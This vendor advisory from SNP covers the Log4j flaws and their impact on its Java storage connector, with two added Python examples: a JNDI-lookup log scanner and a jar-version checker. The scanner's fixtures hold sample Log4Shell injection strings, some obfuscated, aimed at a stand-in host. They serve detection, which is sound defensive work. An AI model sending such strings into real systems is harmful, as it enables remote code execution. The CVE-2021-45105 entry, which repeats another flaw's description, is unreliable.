(SM-2302) Log4j Vulnerability

Updated on May 12th, 2022

Log4j 2.17.2 was released on the 23rd of February. This version will be included

Updated on February 8th, 2022

New release 2202 has been published. This release contains the latest version of log4j 2.17.1.

Updated on January 10th, 2022

On December 28th, another security issue was found in Log4j 2.17.0, and a new version, 2.17.1, was released.

The latest version is still undergoing reanalysis, which may result in further changes. More information is available at https://nvd.nist.gov/vuln/detail/CVE-2021-44832

What is the impact on our customers?

The Java connector uses the log4j library for writing log information to text files. The recently discovered vulnerable logic of log4j is therefore not used by our software and should cause no harm.

How are we responding?

We are going to include the latest available version of log4j in the upcoming release at the beginning of February.

Updated on December 23rd 2021

On December 23rd we released a new Java connector with Log4j 2.17.0.

Contact product_support@snpgroup.com for more information.

Summary

On December 17th 2021, the Apache Software Foundation released version 2.17.0 of the Log4j Java logging library, fixing the following security issues:

  • CVE-2021-44228: a remote code execution vulnerability affecting Log4j 2.0 to 2.14. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

  • CVE-2021-45105: JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

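The condition described above (attacker-controlled text reaching a logger while message lookup substitution is enabled) leaves a recognizable trace in request logs. The following Python is an added example, not part of this advisory and not SNP's code: it scans constructed sample log lines for the `${jndi:` lookup prefix, first resolving the nested `${lower:…}`/`${upper:…}` and `${…:-…}` default-value lookups that Log4j evaluates from the inside out, because a scanner that only matches the literal string misses those variants. The log lines and host names are constructed for the example.

```python
import re

# Constructed sample log lines (not real traffic): one ordinary request, three
# requests whose User-Agent carries a JNDI lookup in plain and disguised forms,
# and one line containing a harmless lookup-like token that must not be flagged.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://lookup-test.invalid/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://lookup-test.invalid/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://lookup-test.invalid/a}"',
    'Report generated for ${date:yyyy-MM-dd} by the scheduler',
]

# Log4j resolves nested lookups inside out: ${lower:X}/${upper:X} change the
# case of X, and ${anything:-X} falls back to the default value X. Lookup names
# are matched case-insensitively, so the regexes ignore case as well.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{jndi:")


def normalize(text: str) -> str:
    """Resolve case and default-value lookups until nothing changes, then
    lower-case the result so the lookup prefix compares case-insensitively."""
    previous = None
    while previous != text:
        previous = text
        text = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()


def is_jndi_lookup(line: str) -> bool:
    """True when the line, after normalization, contains a JNDI lookup prefix."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan_lines(lines):
    """Return (1-based line number, original line) for every flagged line."""
    return [(n, line) for n, line in enumerate(lines, start=1) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for number, line in scan_lines(SAMPLE_LINES):
        print(f"line {number}: {line}")
```

Running the block flags lines 2, 3 and 4 of the sample and leaves the ordinary request and the `${date:…}` token alone. The normalization loop is the part worth keeping when adapting this to a real log pipeline; the exact list of lookups Log4j supports is longer, so treat this as a first-pass filter rather than a complete parser.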
What is the impact on our customers?

The Java connector, which is part of our Storage Management (a component of the Reuse library), contains the Log4j 2.11.1 library, which is used for handling log messages. The following products contain Storage Management:

  • SNP OutBoard™ Data Tiering with NLS

  • SNP OutBoard™ Data Tiering with SDA+

  • SNP OutBoard™ ERP Archiving

  • SNP OutBoard™ DataFridge

  • SNP Glue™

  • SNP Validate

Even though the vulnerability of the Log4j library is critical, the threat is relevant only under specific circumstances, which do not apply in the case of our connector.

The Java connector is used for communication with the external storage technologies listed below.

  • AWS S3

  • AWS Redshift

  • Azure BLOB (if Active Directory authentication or parquet files are used)

  • Azure ADLS Gen1 & Gen2 (if Active Directory authentication or parquet files are used)

  • Azure SQL

  • Azure Synapse

  • Azure Databricks

  • Google Cloud Storage

  • Google BigQuery

  • Snowflake

  • Hive/Impala

If you are not using any of the listed target storages, the security issue is not relevant to you, because the Java connector is not installed in your environment: the Java libraries are unpacked and stored in the specified directory only after a connection to one of these storages has been configured.

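Because the connector's libraries only appear on disk once a connection is configured, the practical check is to look for a `log4j-core` jar in the directory where they are unpacked and read its version. The following Python is an added example, not part of this advisory and not SNP's code: it walks a directory tree, reads `Implementation-Version` from each `log4j-core-*.jar` manifest (falling back to the version in the file name) and reports jars below the 2.17.1 release the advisory names as fixed. The `MIN_FIXED` threshold and the sample jars it creates in a temporary directory are the example's own assumptions; the real unpack directory and jar layout are whatever your installation uses.

```python
import os
import re
import tempfile
import zipfile
from pathlib import Path

# Assumed threshold taken from the advisory: 2.17.1 is the release it names as
# containing the fixes. Anything older, or a jar whose version cannot be read,
# is reported.
MIN_FIXED = (2, 17, 1)

FILENAME_VERSION = re.compile(r"^log4j-core-(\d+(?:\.\d+)*)")


def parse_version(text: str) -> tuple:
    """'2.17.1' -> (2, 17, 1); missing components are padded with 0 so tuples compare."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def jar_version(path: Path):
    """Read Implementation-Version from the jar manifest, falling back to the
    version embedded in the file name. Returns None if neither is available."""
    try:
        with zipfile.ZipFile(path) as jar:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        for line in manifest.splitlines():
            if line.startswith("Implementation-Version:"):
                return parse_version(line.split(":", 1)[1])
    except (zipfile.BadZipFile, KeyError):
        pass
    match = FILENAME_VERSION.match(path.name)
    return parse_version(match.group(1)) if match else None


def scan(root) -> dict:
    """Map each log4j-core jar under root to True when it is below MIN_FIXED
    (or unreadable) and False when it is at or above it."""
    results = {}
    for jar in Path(root).rglob("log4j-core-*.jar"):
        version = jar_version(jar)
        results[str(jar)] = version is None or version < MIN_FIXED
    return results


def make_sample_jar(path: Path, version: str) -> None:
    """Constructed fixture: a minimal jar holding only a manifest."""
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")


def demo() -> dict:
    """Build a throwaway tree with one old and one fixed jar and scan it.
    Returns {file name: flagged}; both jars are constructed for the example."""
    root = Path(tempfile.mkdtemp())
    make_sample_jar(root / "connector" / "lib" / "log4j-core-2.11.1.jar", "2.11.1")
    make_sample_jar(root / "connector" / "lib" / "log4j-core-2.17.1.jar", "2.17.1")
    return {os.path.basename(p): flagged for p, flagged in scan(root).items()}


if __name__ == "__main__":
    for name, flagged in demo().items():
        print(f"{name}: {'UPDATE REQUIRED' if flagged else 'ok'}")
```

Point `scan()` at the connector's unpack directory to use it against a real installation. The manifest is preferred over the file name because a jar can be renamed, while the manifest travels inside it.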
How are we responding?

We are preparing a new version of the Java connector with the fixed Log4j libraries. It will be available in the coming days, and you will be informed by e-mail once it is released.

How should customers proceed?

Check the above information, and if you need support with your specific scenario or have any questions, reach out to us via product_support@snpgroup.com.

To accelerate the resolution, it is very helpful to include the following information in advance:

  • What storages are you using?

    • For the list of configured connections, use Storage Management, transaction /DVD/SM_SETUP.

  • What version of Reuse Library is installed on your system?

    • Run any of our product transactions (e.g. /DVD/Glue), click the menu button at the top left with the SNP icon and select the first menu item (e.g. SNP Glue™ – About).

As soon as we have this information from you, we will be able to tell you whether there is any security impact and, if so, which steps we recommend to mitigate it.